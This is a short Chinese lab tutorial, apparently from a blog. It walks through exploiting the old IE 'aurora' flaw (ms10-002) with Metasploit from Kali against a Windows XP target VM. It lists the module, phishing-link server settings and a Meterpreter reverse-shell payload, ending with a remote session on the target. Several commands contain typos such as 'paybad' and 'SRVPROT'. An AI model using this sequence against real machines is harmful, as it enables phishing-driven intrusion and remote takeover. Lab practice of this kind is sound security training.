渗透测试实战:利用漏洞提权(一)

在一系列的渗透测试中,我们主要是使用了kali Linux作为攻击端,使用Windows xp作为靶机。话不多说,现在开始实践。
这次我们利用IE浏览器上的漏洞来对Windows xp进行提权(只要是为了拿到shell),本次利用漏洞为:ms10-002,是IE的一个经典漏洞(也被称为“极光”漏洞)。
1.我们先在kali Linux中打开msf,在框架下搜索ms10-002的漏洞利用模块并选择。

> msfconsole 
> search ms10-002 

渗透测试实战:利用漏洞提权(一)_第1张图片

2.选中攻击载荷进入模块:

use exploit/windows/browser/ms10-002-aurora

查看攻击载荷的一系列设置:

show options

并进行一系列设置:
因为这种攻击需要借助钓鱼网站/链接之类的东西来辅助,所以我们设置钓鱼网站的IP地址,也就是攻击机的地址和相关服务的端口:

set SRVHOST IP adress    //设置恶意链接的地址
 set SRVPROT 80  //设置服务端口80

设置提权模块:

 set paybad windows/meterpreter/reverse-tcp

设置攻击发起端的IP地址以及监听端口:

set LHOST IP adress
set LPORT 1211

设置完毕,效果如下:
渗透测试实战:利用漏洞提权(一)_第2张图片

这样再输入exploit启动载荷,就进入了攻击状态。鱼钩鱼饵已经撒出去了,就等鱼儿咬钩了。
让靶机访问钓鱼的网站:
渗透测试实战:利用漏洞提权(一)_第3张图片

靶机访问网站,攻击机接收到了会话:
渗透测试实战:利用漏洞提权(一)_第4张图片

查看会话ID:

sessions -i

提权:

sessions -i id number

攻击机拿到了靶机的shell,可以为所欲为了:
渗透测试实战:利用漏洞提权(一)_第5张图片

由于在下水平有限,有错误不当之处欢迎各位看官批评指正,本次实验相关原理知识我会记录在后面的学习笔记当中。

你可能感兴趣的:(渗透测试实战:利用漏洞提权(一))